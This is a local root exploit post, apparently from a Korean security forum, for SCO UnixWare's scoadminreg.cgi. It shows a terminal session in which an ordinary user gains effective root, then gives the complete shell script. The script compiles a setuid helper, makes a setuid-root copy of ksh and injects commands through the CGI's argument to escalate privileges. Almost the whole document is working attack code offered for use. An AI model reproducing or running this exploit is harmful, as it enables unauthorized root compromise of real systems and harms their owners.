unixware:~> uname -a UnixWare unixware 5 7.1.1 i386 x86at SCO UNIX_SVR5 unixware:~> id uid=101(mearee) gid=1(other) unixware:~> ./scoadminreg.sh jGgM root exploit http://www.netemperor.com/ Mail: jggm@mail.com Manager: -c /tmp/jggm;/tmp/jggm; ERROR: Cannot find a Webtop object associated with -c /tmp/jggm ERROR: Could not add object () RESULT: Error: Object ".../_ens/Org" already exists. Location: /webtop/webtops/en_US/admin/scoadminre gError.html Success... # id uid=101(mearee) gid=1(other) euid=0(root) # It can remote attack...maybe... :)) ----------------------------------------------- Korean Security Forum. http://www.forsecure.com http://www.netemperor.com ----------------------------------------------- Here is file... -------------------------------------------------------------- #!/bin/sh CC="gcc" SCOADMIN=/opt/webtop/bin/i3un0212/cgi- bin/admin/scoadminreg.cgi # # # # echo echo "jGgM root exploit" echo "http://www.netemperor.com/"; echo echo "Mail: jggm@mail.com" echo if [ ! -x $SCOADMIN ]; then echo "$SCOADMIN file not found" exit 2; fi cat >/tmp/jggm.c <<_EOF main() { setuid(0); setgid(0); chown("/tmp/jGgM_Shell", 0, 0); chmod("/tmp/jGgM_Shell", 04755); } _EOF cp /bin/ksh /tmp/jGgM_Shell $CC -o /tmp/jggm /tmp/jggm.c $SCOADMIN "-c /tmp/jggm;/tmp/jggm;" rm -rf /tmp/jggm /tmp/jggm.c /tmp/jGgM_Shell # end of file.. -----------------------------------------------------------------
